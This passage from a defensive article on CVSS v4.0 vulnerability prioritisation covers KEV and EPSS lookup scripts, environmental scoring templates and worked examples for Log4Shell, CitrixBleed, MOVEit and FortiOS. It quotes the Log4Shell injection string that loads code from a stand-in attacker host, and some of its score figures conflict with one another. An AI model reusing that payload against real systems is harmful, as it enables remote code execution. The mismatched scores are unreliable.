practical triage workflows, the sequence often becomes:</p><ol><li><strong>Start with CVSS-B</strong> to establish the vendor-neutral severity baseline.</li><li><strong>Apply Environmental metrics</strong> using known internal context to produce <strong>CVSS-BE</strong>.</li><li><strong>Add Threat metrics later</strong> as evidence matures, producing <strong>CVSS-BTE</strong>.</li></ol><p>This workflow is especially useful for <strong>newly disclosed vulnerabilities</strong>, where waiting for mature threat data can slow prioritization at exactly the moment fast decisions are needed.</p><p>It also reflects a core reality of vulnerability operations:</p><p><strong>Environmental context is usually local and immediate. Threat context is often external and delayed.</strong></p><p>That does <strong>not</strong> make <strong>CVSS-BT</strong> unimportant.</p><p>CVSS-BT remains a fully valid and useful score, especially for:</p><ul><li>threat-informed prioritization programs</li><li>dashboards that track exploitation pressure across large CVE sets</li><li>external reporting pipelines</li><li>security teams that heavily integrate KEV, exploit feeds, EPSS, or CTI into daily triage</li><li>situations where the threat picture is already mature, but local environmental scoring has not yet been completed</li></ul><p>But for many defenders, patch teams, asset owners, and risk managers, <strong>CVSS-BE is often the first score that actually reflects operational reality inside the organization</strong>.</p><p>A useful way to think about the score sets is this:</p><ul><li><strong>CVSS-B</strong> tells you the general, vendor-neutral worst-case severity</li><li><strong>CVSS-BE</strong> tells you what the vulnerability means in <em>your</em> environment</li><li><strong>CVSS-BTE</strong> tells you what it means in <em>your</em> environment under the <em>current threat landscape</em></li></ul><p>That distinction matters.</p><p>A vulnerability may look severe in abstract, but drop meaningfully once you account for isolation, segmentation, limited exposure, or low business impact. Another vulnerability may remain highly important even in a constrained environment because the affected asset is mission-critical. And once credible threat evidence appears — public exploitation, KEV inclusion, operational tooling, or real adversary use — the priority can rise again under <strong>BTE</strong>.</p><p>So while the formal model includes <strong>B</strong>, <strong>BT</strong>, <strong>BE</strong>, and <strong>BTE</strong> as parallel valid score sets, many real-world programs naturally operate in a different practical sequence:</p><p><strong>CVSS-B → CVSS-BE → CVSS-BTE</strong></p><p>That order is not a contradiction of the framework. It is simply how many teams apply the framework when immediate local context is available before complete external threat intelligence.</p><p>For that reason, if your goal is fast and defensible vulnerability triage, <strong>BE is often the first meaningful refinement of Base</strong>, and <strong>BTE becomes the fully contextualized score once both environment and threat are understood</strong>.</p><h3>Threat Metrics in Practice: KEV, EPSS, and Exploit Feeds</h3><h4>CISA Known Exploited Vulnerabilities (KEV) Catalog</h4><p>The KEV catalog is the gold standard for E:A determination. CISA adds a CVE only when it has confirmed, real-world exploitation evidence. As of March 2026, the catalog contains approximately 1,550+ CVEs — out of over 240,000 published CVEs in NVD. That is well under 1%.</p><pre># Check KEV via API — works immediately, no registration needed<br>curl -s "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json" \<br>  | python3 -c "<br>import json, sys<br>data = json.load(sys.stdin)<br>cve_id = 'CVE-2021-44228'<br>match = [v for v in data['vulnerabilities'] if v['cveID'] == cve_id]<br>if match:<br>    v = match[0]<br>    print(f'IN KEV: {v[\"vulnerabilityName\"]}')<br>    print(f'Due Date: {v[\"dueDate\"]}')<br>    print(f'Required Action: {v[\"requiredAction\"]}')<br>else:<br>    print('Not in KEV')<br>"<br># Output for Log4Shell:<br># IN KEV: Apache Log4j2 Remote Code Execution Vulnerability<br># Due Date: 2021-12-24<br># Required Action: Apply updates per vendor instructions.</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ojvuO08eeq7sHLCxfQT4DA.png"></figure><p><strong>Batch KEV check — Python with CSV output:</strong></p><pre>import json, requests, csv, sys<br>from datetime import datetime<br>def load_kev() -&gt; set:<br>    """Download and return the set of CVE IDs in CISA KEV."""<br>    url = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"<br>    response = requests.get(url, timeout=30)<br>    response.raise_for_status()<br>    return {v["cveID"]: v for v in response.json()["vulnerabilities"]}<br>def load_epss(cve_ids: list) -&gt; dict:<br>    """Fetch EPSS scores for a list of CVE IDs from FIRST.org API."""<br>    base_url = "https://api.first.org/data/v1/epss"<br>    scores = {}<br>    # API accepts comma-separated CVE IDs, max ~30 per request<br>    for i in range(0, len(cve_ids), 30):<br>        batch = ",".join(cve_ids[i:i+30])<br>        resp = requests.get(f"{base_url}?cve={batch}", timeout=30)<br>        if resp.ok:<br>            for item in resp.json().get("data", []):<br>                scores[item["cve"]] = float(item["epss"])<br>    return scores<br>def determine_exploit_maturity(cve_id: str, kev_data: dict, epss_scores: dict) -&gt; str:<br>    """<br>    Determine Exploit Maturity based on KEV and EPSS.<br>    Returns the CVSS v4.0 E: value.<br>    """<br>    if cve_id in kev_data:<br>        return "E:A"  # Confirmed active exploitation<br>    epss = epss_scores.get(cve_id, 0.0)<br>    if epss &gt;= 0.5:<br>        # EPSS ≥ 50% = high exploitation likelihood → strong POC signal<br>        return "E:P"<br>    elif epss &gt;= 0.1:<br>        # Moderate signal - verify against ExploitDB/Metasploit/GitHub<br>        return "E:P"<br>    else:<br>        # Low EPSS, not in KEV - no exploitation evidence<br>        return "E:U"<br># Example: Enrich a list of CVEs from your scanner<br>cves_from_scanner = [<br>    "CVE-2021-44228",  # Log4Shell<br>    "CVE-2023-4966",   # CitrixBleed<br>    "CVE-2023-34362",  # MOVEit SQLi<br>    "CVE-2024-21762",  # FortiOS SSL VPN<br>    "CVE-2025-32433",  # Erlang/OTP SSH<br>]<br>kev = load_kev()<br>epss = load_epss(cves_from_scanner)<br>print(f"{'CVE':&lt;20} {'KEV':&gt;5} {'EPSS':&gt;8} {'E Value':&lt;10}")<br>print("-" * 50)<br>for cve in cves_from_scanner:<br>    in_kev = "YES" if cve in kev else "NO"<br>    epss_score = epss.get(cve, 0.0)<br>    e_value = determine_exploit_maturity(cve, kev, epss)<br>    print(f"{cve:&lt;20} {in_kev:&gt;5} {epss_score:&gt;8.4f} {e_value:&lt;10}")</pre><h4>EPSS — The Probabilistic Complement to CVSS</h4><p>The <strong>Exploit Prediction Scoring System (EPSS)</strong> is a machine learning model maintained by FIRST.org that predicts the probability of a CVE being exploited in the wild within 30 days. It complements CVSS by answering a different question: not “how severe is the vulnerability?” but “how likely is it to be exploited soon?”</p><p><strong>EPSS characteristics:</strong></p><ul><li>Score range: 0.0 to 1.0 (probability)</li><li>Updated daily</li><li>Uses ML trained on NVD data, Metasploit module availability, ExploitDB entries, active threat feeds</li><li>Free API: <a href="https://api.first.org/data/v1/epss?cve=CVE-XXXX-XXXXX">https://api.first.org/data/v1/epss?cve=CVE-XXXX-XXXXX</a></li></ul><p><strong>How to combine CVSS + EPSS for prioritization:</strong></p><pre>Priority Matrix:<br>                    EPSS Low (&lt;0.1)    EPSS Medium (0.1-0.5)    EPSS High (&gt;0.5)<br>CVSS High/Critical   → Schedule          → Priority                → Immediate<br>CVSS Medium          → Backlog           → Schedule                → Priority<br>CVSS Low             → Accept/Ignore     → Backlog                 → Schedule<br><br>Real examples (approximate, as of early 2024):<br>  CVE-2021-44228 (Log4Shell):   CVSS 10.0, EPSS ~0.97 → Immediate<br>  CVE-2023-4966  (CitrixBleed): CVSS 9.4,  EPSS ~0.97 → Immediate<br>  CVE-2021-34527 (PrintNightm): CVSS 8.8,  EPSS ~0.96 → Immediate<br>  CVE-2023-34362 (MOVEit):      CVSS 9.8,  EPSS ~0.96 → Immediate<br>  Typical new CVE (no exploit): CVSS 7.5,  EPSS ~0.002 → Schedule/Backlog<br><br># Quick EPSS check for a CVE<br>curl -s "https://api.first.org/data/v1/epss?cve=CVE-2021-44228" \<br>  | python3 -c "import json,sys; d=json.load(sys.stdin); print(d['data'][0])"<br># {'cve': 'CVE-2021-44228', 'epss': '0.97530', 'percentile': '1.00000', 'date': '&lt;today&gt;'}<br># EPSS scores are updated daily - check the date field to confirm freshness</pre><h4>The Step-by-Step Threat Metric Determination Workflow</h4><pre>For each CVE in your scanner output:<br>Step 1: Check CISA KEV (30 seconds, fully automated)<br>  → IN KEV?  → Set E:A, mark as highest priority<br>  → NOT IN KEV? → Continue to Step 2<br>Step 2: Check EPSS score<br>  → EPSS ≥ 0.5?  → Strong exploitation likelihood → E:P at minimum<br>  → EPSS 0.1–0.5? → Moderate likelihood → E:P (verify against ExploitDB)<br>  → EPSS &lt; 0.1?  → Low likelihood → Continue to Step 3<br>Step 3: Check ExploitDB / Metasploit / GitHub<br>  searchsploit CVE-XXXX-XXXXX<br>  msfconsole -q -x "search cve:XXXX-XXXXX type:exploit; exit"<br>  → Module/exploit found? → E:P<br>  → Nothing found? → Continue to Step 4<br>Step 4: Default assignment<br>  → No KEV, no EPSS signal, no public exploit → E:U</pre><h3>Environmental Metrics: Scoring for Your Environment</h3><h4>The Core Principle</h4><p>A vulnerability vendor scores a system as if it is:</p><ul><li>Directly accessible from the internet (AV:N)</li><li>Running with no compensating controls</li><li>Processing your most sensitive data</li><li>Able to reach any system in your network</li></ul><p>Your security team knows this is almost never true for any given system. Environmental metrics encode that knowledge as documented, auditable adjustments.</p><h4>Practical Environmental Metric Decisions</h4><p><strong>Decision 1: Network Exposure</strong></p><pre>Vendor scored: AV:N (reachable from anywhere on the internet)<br>Scenario A - Internet-facing server:<br>  No change needed. AV:N reflects reality.<br>Scenario B - Internal VLAN, firewall-controlled:<br>  MAV:A (Modified Attack Vector: Adjacent)<br>  Documentation: "System resides on VLAN 10, firewall rule FW-2041 blocks<br>  all inbound access from WAN. Last verified: [date], Change ticket: [ID]"<br>  Score effect: -1.5 to -2.5 points typically<br>Scenario C - Jump host required, no direct network path:<br>  MAV:L (Modified Attack Vector: Local)<br>  Documentation: "SSH access only via jump-host JUMP-01, no direct routing<br>  from any external zone. Network diagram: NDG-004"<br>  Score effect: more significant reduction</pre><p><strong>Decision 2: Compensating Security Controls</strong></p><pre>Vendor scored: AC:L (low complexity — straightforward exploitation)<br>Your reality: system access requires:<br>  (1) VPN authentication with hardware MFA token<br>  (2) Jump host with session recording<br>  (3) IP allowlisting to specific bastion hosts<br>→ MAC:H (Modified Attack Complexity: High)<br>  "Exploiting this in our environment requires bypassing enterprise VPN<br>  (MFA-protected), jump host IP filtering, and session monitoring.<br>  Policy reference: NET-POLICY-022"</pre><p><strong>Decision 3: Data Sensitivity</strong></p><pre>Vendor scored: VC:H (high confidentiality impact — assumes worst-case data)<br>Scenario A - System processes PII, financial, or health data:<br>  No change. VC:H is appropriate.<br>  Consider setting CR:H to amplify the score.<br>Scenario B - System is a build server, processes only source code and<br>artifact hashes, no customer data:<br>  MVC:L (Modified Vulnerable System Confidentiality: Low)<br>  Documentation: "System data classification: Internal/Technical per<br>  DLP-2023. No PII, financial, or regulated data categories."</pre><p><strong>Decision 4: Blast Radius (Subsequent System Impact)</strong></p><pre>Vendor scored: SC:H/SI:H/SA:H (can affect downstream systems)<br>Your reality: this system has no outbound connections except to its<br>own read-only database. No service accounts with lateral movement<br>potential. Network segmentation enforced by firewall.<br>MSC:N / MSI:N / MSA:N<br>Documentation: "System [ID] network connections: inbound from [A,B],<br>outbound to [DB-READONLY] only. Firewall egress rules [FW-2201 through<br>FW-2203] block all other outbound. Network architecture diagram NDG-007."</pre><p><strong>Decision 5: Security Requirements — Adjusting for Asset Criticality</strong></p><p>Security Requirements (CR/IR/AR) work differently from Modified Base metrics. Instead of overriding vendor assumptions, they adjust the score up or down based on how important CIA is for this asset in your organization:</p><pre>High-criticality asset (production customer database):<br>  CR:H / IR:H / AR:H<br>  → Score increases above the environmental-adjusted Base<br>  → The same vulnerability is MORE severe here than the vendor assumed<br>Low-criticality asset (developer test environment):<br>  CR:L / IR:L / AR:L<br>  → Score decreases below the environmental-adjusted Base<br>  → The same vulnerability is LESS severe here<br>Same vulnerability, CVE-2023-44487 (HTTP/2 Rapid Reset):<br>  On production CDN edge:  BTE = 8.9 High (AR:H - availability critical)<br>  On dev test instance:    BTE = 3.2 Low  (AR:L - availability optional)</pre><h4>Environmental Adjustment Documentation Template</h4><pre>CVE: [CVE-XXXX-XXXXX]<br>Asset: [system name / ID]<br>Asset Classification: [Confidentiality: L/M/H] [Integrity: L/M/H] [Availability: L/M/H]<br>Base Vector (from NVD):<br>  [CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H]<br>  Base Score: [10.0 Critical]<br>Threat Enrichment:<br>  E: [A/P/U] - Source: [CISA KEV / ExploitDB EDB-XXXXX / No evidence]<br>  EPSS: [score] - Percentile: [XX]th<br>Environmental Adjustments:<br>  [MAV:A] - [System on internal VLAN, not internet-accessible. Evidence: FW-RULE-XXXX]<br>  [MAC:H] - [Access requires MFA VPN. Evidence: POLICY-NET-022]<br>  [MSC:N/MSI:N/MSA:N] - [Isolated system, no lateral movement paths. Evidence: NDG-007]<br>BTE Vector:<br>  [CVSS:4.0/.../E:P/MAV:A/MAC:H/MSC:N/MSI:N/MSA:N]<br>  BTE Score: [5.9 Medium]<br>Approved by: [Name, Title]<br>Date: [YYYY-MM-DD]<br>Next Review: [YYYY-MM-DD or "on next change event"]<br>Change Ticket: [TICKET-ID]</pre><h3>Worked Example 1: CVE-2021–44228 Log4Shell — Score Evolution Over 72 Hours</h3><p>Log4Shell is the canonical example of a 10.0 Critical vulnerability that genuinely deserved its score and its emergency response. It also illustrates why CVSS scores must be treated as dynamic, not static.</p><h4>The Vulnerability</h4><p><strong>CVE-2021–44228</strong> — Apache Log4j2 JNDI injection, disclosed December 9–10, 2021. Log4j2 is a ubiquitous Java logging library used in virtually every Java application stack. The vulnerability allowed unauthenticated remote code execution by logging a specially crafted string like ${jndi:ldap://attacker.com/exploit}.</p><pre>Base Vector:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>Reading the vector:<br>  AV:N   - Any internet attacker can reach Log4j (it processes log input from requests)<br>  AC:L   - One malicious string in any logged field (User-Agent, username, etc.)<br>  AT:N   - No special deployment conditions; Log4j's default config enables JNDI lookup<br>  PR:N   - Unauthenticated; the string is logged before any auth check<br>  UI:N   - No user interaction<br>  VC:H   - Full compromise of the JVM process (RCE)<br>  VI:H   - Arbitrary code execution = arbitrary data modification<br>  VA:H   - Process crash or disruption possible<br>  SC:H   - Applications run with broad permissions; lateral movement to databases,<br>           APIs, secrets vaults is documented in nearly every case study<br>  SI:H   - Downstream integrity compromise confirmed in attacks<br>  SA:H   - Downstream availability impact confirmed<br>Base Score: 10.0 Critical</pre><h4>Hour 0: Disclosure (December 9, 2021)</h4><pre>CVSS-B:  10.0 Critical (vendor-published score)<br>E:       X (Not Defined) — no public exploit yet at moment of NVD publication<br>Security team action with default (E:X):<br>  Scanner shows 10.0 - emergency response initiated<br>  This is CORRECT. E:X defaults to E:A, and JNDI proof-of-concept<br>  was already circulating in private channels at disclosure.</pre><h4>Hour 12–24: PoC Goes Public</h4><p>By December 10–11, multiple working proof-of-concept exploits appeared on GitHub. Mass scanning for vulnerable Log4j endpoints began within hours.</p><pre>Threat update: E:P (POC publicly available)<br>EPSS: immediately climbs toward 0.90+<br>CVSS-BT: still 10.0 Critical (E:P keeps score near maximum)<br>What changed operationally: The window for "orderly patching" closed.<br>Evidence of active scanning meant any vulnerable internet-facing system<br>was being actively probed.</pre><h4>Hour 48–72: Mass Exploitation — Botnets, Ransomware, State Actors</h4><p>By December 11–13, CISA confirmed active exploitation. The KEV catalog entry was published with a remediation due date of December 24, 2021 (for federal agencies). NSA, GCHQ, and CISA issued joint advisories. Threat actors confirmed exploiting Log4Shell included Conti ransomware affiliates, Iranian state actors (APT35/Charming Kitten), Chinese state actors, and multiple criminal groups.</p><pre>Threat update: E:A (actively exploited — CISA KEV confirmed)<br>CVSS-BT: 10.0 Critical (E:A maximum)<br>Any environmental adjustment to MAV or MAC must be verified:<br>  "Is this system actually isolated from the internet?"<br>  → Internet-facing: 10.0 - immediate patch, no exceptions<br>  → Internal, no JNDI enabled: consider E:P + MAV:A → ~7.4 High<br>  → Internal, JNDI disabled in Log4j config: document mitigation as<br>    compensating control; MAT:P or MAC:H may apply<br>Note: CVE-2021-45046 (bypass for initial mitigations) and<br>CVE-2021-45105 (DoS) were published within days, complicating patching.</pre><h4>Final Score Comparison: Same CVE, Different Contexts</h4><p><strong>Key lesson:</strong> Even for a genuine 10.0 emergency, environmental context changes the <em>response mechanism</em> even when it cannot reduce the overall priority. An internet-facing production server and an internal test instance require different actions, documented by CVSS-BTE.</p><h3>Worked Example 2: CVE-2025–32433 Erlang/OTP SSH — From 10.0 to 5.9</h3><p>CVE-2025–32433 is an unauthenticated pre-auth RCE in Erlang/OTP’s SSH server. Base score 10.0. This example demonstrates how environmental context appropriately reduces emergency response to scheduled patching.</p><h4>Step 0: The Base Score (NVD Published)</h4><pre>Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>Score:  10.0 Critical<br>Reading the vector:<br>  AV:N  - SSH is exposed (vendor assumes internet-facing, worst case)<br>  AC:L  - Exploitation is straightforward once you reach the SSH port<br>  AT:N  - No special configuration required; default OTP SSH setup is vulnerable<br>  PR:N  - Pre-authentication RCE - no credentials needed<br>  UI:N  - No user interaction required<br>  VC:H  - Full code execution on the Erlang/OTP process<br>  VI:H  - Attacker can write files, modify state<br>  VA:H  - Can crash or kill the OTP application<br>  SC:H  - Erlang applications often manage distributed systems; lateral pivot possible<br>  SI:H, SA:H - Downstream system compromise possible</pre><h4>Step 1: Modify Attack Vector — Is SSH Actually Exposed?</h4><pre>Question: Is this Erlang/OTP SSH service accessible from the internet?<br>Scenario A - Internet-facing (load balancer → Erlang cluster):<br>  No change. AV:N is accurate. Score: 10.0.<br>  This is a genuine emergency. Patch or firewall the port immediately.<br>Scenario B - Internal cluster, accessible from corporate network only:<br>  MAV:A (Modified Attack Vector: Adjacent)<br>  Evidence: Firewall rule FW-1042, network topology confirms no external routing.<br>  Updated vector: CVSS:4.0/.../MAV:A<br>  Updated score:  9.4 Critical<br>  Still Critical - but attacker must have already penetrated your perimeter.<br>  Different threat model.</pre><h4>Step 2: Add Attack Complexity — Compensating Controls</h4><pre>In many corporate deployments, SSH access also requires:<br>  - VPN connection with hardware token MFA<br>  - Jump host (bastion server) with session recording<br>  - IP allowlist restricting to specific admin hosts<br>→ MAC:H (Modified Attack Complexity: High)<br>Updated vector: CVSS:4.0/.../MAV:A/MAC:H<br>Updated score:  8.7 High<br>Now in High tier - 30-day SLA instead of a 24–72 hour emergency response.</pre><h4>Step 3: Add Threat Intelligence</h4><pre>Checking sources (as of initial disclosure):CISA KEV: Not listed (at time of initial disclosure)<br>EPSS:     ~0.04 initially (low exploitation probability, no weaponized exploit yet)<br>ExploitDB: No entry yet<br>GitHub:   POC repositories appeared within days of disclosure (search CVE-2025-32433)<br>→ E:P (Proof of Concept exists, not yet actively exploited in wild)<br>Updated vector: CVSS:4.0/.../E:P/MAV:A/MAC:H<br>Updated score:  7.4 High<br>If KEV entry appears: immediately reclassify to E:A → score rises back toward 9.0<br></pre><h4>Step 4: Assess Subsequent System Impact</h4><pre>Question: Can this Erlang/OTP node reach sensitive downstream systems?<br>Scenario A - Erlang node manages distributed message queue with connections<br>to all application databases:<br>  No change to SC/SI/SA - the blast radius is real.<br>  Score stays at 7.4 High.<br>Scenario B - Isolated analytics Erlang node, read-only DB access,<br>no write access to production systems:<br>  MSC:L / MSI:N / MSA:L<br>  "Node only reads from replica DB, no write paths, no service account<br>  with production access. Network egress rules FW-2089 confirmed."<br>  Updated score: ~6.1 Medium</pre><h4>Final Comparison Table</h4><p><strong>The takeaway:</strong> A genuine 10.0 pre-auth RCE becomes a 5.9 Medium for an internal, MFA-protected, isolated node with no active exploit. That is not negligence — that is accurate risk modeling.</p><h3>Worked Example 3: Firmware Report — 18 Criticals Become Medium</h3><p>This example demonstrates how Environmental metrics transform a firmware scanner report into an actionable prioritized list.</p><h4>The Problem</h4><p>A firmware scan of an industrial IoT sensor returns:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/587/1*eY9fGmcZJ_M1qajmdHXeBg.png"></figure><p>The raw scanner output shows 3 Critical CVEs and 13 High CVEs — all requiring immediate response under Base-only scoring.</p><h4>The Device Context</h4><ul><li>Industrial flow sensor on a process control OT network</li><li><strong>Not internet-accessible</strong> — connected only to local OT subnet</li><li>Read-only sensor data; no PII, no financial data</li><li>No GUI, no interactive user sessions</li><li>Vendor scored all CVEs assuming internet-facing deployment (BusyBox can be deployed anywhere)</li></ul><h4>Key Environmental Adjustment: MAV:A</h4><p>BusyBox CVEs with AV:N assume the applet is accessible from the internet. On this sensor, it is accessible only from the adjacent OT subnet. Single adjustment: MAV:A.</p><p><strong>Before and After</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/575/1*BlS9ghtDCXWr-Lc5OjtY9A.png"></figure><p><strong>Summary transformation:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/575/1*97sxvbu02pAvKM1TZBlSCQ.png"></figure><p><strong>Result:</strong> The 3am emergency patching requirement disappears. The highest-priority items are now High severity, manageable within the next OT maintenance window. A team that was facing a weekend emergency now has a structured, scheduled response.</p><h4>Important Caveat: Safety Metrics for OT</h4><p>If this sensor is part of a safety-critical process control system (chemical plant, power grid, water treatment), add the Supplemental Safety metric:</p><pre>/S:P (Safety: Present)<br>This does not change the CVSS score. But it flags to any responder<br>that exploitation could have physical safety consequences - and those<br>consequences must be evaluated against the CVSS-BTE severity.<br>A CVSS-BTE 6.5 Medium with S:P on a safety controller may require<br>faster response than a 7.9 High with S:N on an admin workstation.</pre><h3>Worked Example 4: CitrixBleed, MOVEit, FortiOS</h3><p>Three real-world cases from 2023–2024 that illustrate different CVSS adjustment scenarios.</p><h4>Case A: CVE-2023–4966 — CitrixBleed (Citrix NetScaler)</h4><p><strong>Vulnerability:</strong> Sensitive information disclosure in Citrix NetScaler Application Delivery Controller (ADC) and Gateway. An unauthenticated attacker could retrieve session tokens, enabling session hijacking without credentials. Used extensively by ransomware affiliates (LockBit, Medusa) and government-sector attackers.</p><pre>Base Vector:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H<br>Base Score: 9.4 Critical<br>Reading the base vector:<br>  AV:N  - NetScaler is internet-facing by design (it is a load balancer/VPN endpoint)<br>  AC:L  - Single HTTP request to /gwtest/formssso endpoint<br>  AT:N  - No special preconditions; affects default configuration<br>  PR:N  - Unauthenticated<br>  UI:N  - No user interaction<br>  VC:H  - Session token retrieved → full user account access<br>  VI:N  - The vulnerability itself doesn't modify data on NetScaler<br>  VA:N  - No availability impact from session theft<br>  SC:H  - Session tokens enable access to downstream internal resources<br>  SI:H  - Attacker with stolen session can modify data in downstream systems<br>  SA:H  - Downstream systems can be disrupted<br>CISA KEV: Added October 18, 2023 (within weeks of disclosure)<br>EPSS: ~0.97+ (extremely high, immediate mass exploitation)<br>Threat actors: LockBit affiliate, Boeing breach (confirmed), Allen &amp; Overy, more</pre><p><strong>Environmental scoring for an external-facing Citrix deployment:</strong></p><pre>For a typical enterprise with internet-facing NetScaler:<br>  E:A  — In CISA KEV, confirmed ransomware exploitation<br>BTE (no modification possible - it IS internet-facing):<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H/E:A<br>Score: 9.4 Critical - Immediate response required.<br>No environmental adjustment can justify delay here.<br>If you have an internet-facing NetScaler, this requires a 24–72 hour emergency response.</pre><p><strong>Key operational point:</strong> CitrixBleed demonstrates why E:A (CISA KEV entry) must immediately override any environmental reduction arguments. The question is not "is our NetScaler important enough to patch quickly?" The question is "are there ransomware groups scanning for CitrixBleed right now?" The answer (confirmed by CISA, FBI, and multiple incident response reports) was: yes.</p><h4>Case B: CVE-2023–34362 — MOVEit Transfer SQLi</h4><p><strong>Vulnerability:</strong> SQL injection in Progress Software’s MOVEit Transfer managed file transfer platform. Exploited exclusively by the Cl0p ransomware group in a coordinated mass-exploitation campaign in May–June 2023. Affected 2,000+ organizations globally, including government agencies, hospitals, and financial firms.</p><pre>Base Vector:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>Base Score: 9.8 Critical<br>Key characteristics:<br>  AT:N - Default configuration is vulnerable<br>  AU:Y (Supplemental: Automatable: Yes) - Cl0p used automated mass exploitation<br>  V:C  (Supplemental: Value Density: Concentrated) - File transfer platforms hold<br>       files from MANY organizations → single compromise = mass data access</pre><p><strong>The supply chain scoring challenge:</strong></p><p>MOVEit Transfer is a <em>managed file transfer service</em>. Organizations that used it often uploaded data from multiple business partners. The Subsequent System impact in v4.0 terms extends not just to internal systems, but to third-party data processed through the platform.</p><pre>For a MOVEit instance processing healthcare data for 50 partner organizations:<br>SC:H (data from all 50 partner orgs is accessible)<br>SI:H (data integrity of all 50 orgs' files at risk)<br>SA:H (disruption affects all 50 orgs' workflows)<br>This is exactly the v4.0 Subsequent System model working as intended.<br>The "blast radius" in SC/SI/SA must reflect the full downstream exposure,<br>not just the immediate server.</pre><h4>Case C: CVE-2024–21762 — FortiOS SSL VPN Out-of-Bounds Write</h4><p><strong>Vulnerability:</strong> Out-of-bounds write in FortiOS and FortiProxy SSL VPN. Enables unauthenticated remote code execution via specially crafted HTTP requests. Exploited by Chinese state-sponsored threat actors (attributed to Volt Typhoon and related clusters) for initial access into US critical infrastructure.</p><pre>Base Vector:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>Base Score: 9.6 Critical<br>CISA KEV: Added February 9, 2024<br>Attribution: Chinese state actors (Volt Typhoon, BRONZE SILHOUETTE)<br>Targets: US telecom, utilities, water systems, defense contractors<br>EPSS: ~0.97+</pre><p><strong>Why environmental adjustments cannot help here:</strong></p><pre>Some organizations attempted to argue:<br>  "Our FortiGate is behind our ISP's firewall" → This is the perimeter device;<br>  it IS the firewall. MAV:A does not apply.<br>"We have IDS monitoring" → FortiOS exploitation bypasses host-based monitoring<br>  because the exploit targets the device providing network access.<br>  "We have incident response capability" → This affects recovery, not exploitability.<br>For any internet-facing SSL VPN endpoint: E:A + AV:N = no score reduction possible.<br>The CVSS-BTE remains at or near 9.6 Critical.</pre><p><strong>Key lesson from these three cases:</strong> Environmental metrics are for reducing false priorities on legitimate non-urgent vulnerabilities. They are not for manufacturing justifications to defer critical work. When CISA KEV + high EPSS + confirmed exploitation by nation-state or ransomware actors = E:A, your response is patching, not scoring.</p><h3>Industry-Specific Scoring: Healthcare, Finance, OT/ICS</h3><p>Different industries have fundamentally different CIA priority models. This affects how Security Requirements (CR/IR/AR) should be set.</p><h4>Healthcare (HIPAA Environment)</h4><p>In healthcare, <strong>Confidentiality</strong> is paramount — HIPAA civil penalties range from ~$137 to ~$68,928 per violation (inflation-adjusted tiers as of 2023), with annual caps per violation category up to $2M+. Patient data exposure is the primary risk.</p><pre>Healthcare Security Requirements Profile:<br>  CR:H — Patient data confidentiality: extremely high (HIPAA, HITECH)<br>  IR:H — Clinical data integrity: critical (wrong data → clinical decisions)<br>  AR:H — System availability: high (clinical workflows depend on uptime)<br>Example: CVE on a hospital's Electronic Health Record (EHR) system:<br>Base: CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N<br>Base Score: 5.3 Medium<br>With healthcare profile:<br>  /CR:H/IR:H/AR:H<br>BTE Score: ~7.1 High - urgent patching required<br>Same vulnerability on internal developer workstation:<br>  /CR:L/IR:L/AR:L/MAV:L<br>BTE Score: ~2.8 Low - next maintenance window</pre><p><strong>Healthcare-specific supplemental metrics:</strong></p><ul><li>S:P (Safety: Present) — for vulnerabilities in infusion pumps, ventilators, monitoring systems</li><li>R:I (Recovery: Irrecoverable) — for ransomware affecting PACS/clinical imaging</li></ul><h4>Financial Services (PCI-DSS / SOX Environment)</h4><p>In finance, <strong>Integrity</strong> is often more critical than Confidentiality — financial data manipulation can cause immediate monetary loss, while data disclosure may take weeks to monetize.</p><pre>Financial Services Security Requirements Profile:<br>  CR:H — Customer financial data: high (regulatory, reputational)<br>  IR:H — Transaction integrity: CRITICAL (fraud, unauthorized transfers)<br>  AR:H — Trading/payment systems: critical (SLAs, regulatory requirements)<br>Key distinction from healthcare: IR:H often matters MORE than CR:H here.<br>Example: SQL injection in a payment processing portal:<br>Base: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N<br>Base Score: 8.9 High<br>With PCI environment profile for payment card data scope:<br>  /CR:H/IR:H/AR:H<br>BTE Score: ~9.4 Critical - treat as emergency<br>Same vulnerability on a market-data read-only display terminal:<br>  /CR:L/IR:L/AR:L/MAV:A<br>BTE Score: ~4.1 Medium</pre><h4>OT/ICS (Industrial Control Systems)</h4><p>In OT environments, <strong>Availability and Safety</strong> often supersede Confidentiality. Data breaches are bad; plant shutdowns and physical harm are catastrophic.</p><pre>OT/ICS Security Requirements Profile:<br>  CR:L  — Process data is often not sensitive (flow rates, temperatures)<br>  IR:H  — Control data integrity is critical (wrong setpoint = equipment damage)<br>  AR:H  — Process availability is critical (plant shutdown = immediate loss)<br>  S:P   — Many OT vulnerabilities have physical safety implications<br>Critical distinction: In OT, patching is NOT always possible on short timelines.<br>A patch that requires a production system restart may be more disruptive than<br>the vulnerability itself.<br>CVSS-BTE for OT must account for:<br>  1. The actual network exposure (almost always MAV:A or MAV:L for OT)<br>  2. The patching cost (use Vulnerability Response Effort: RE:H for OT)<br>  3. The safety impact (Safety: S:P when applicable)<br>Example: CVE on a Siemens S7 PLC (SCADA context):<br>Base: 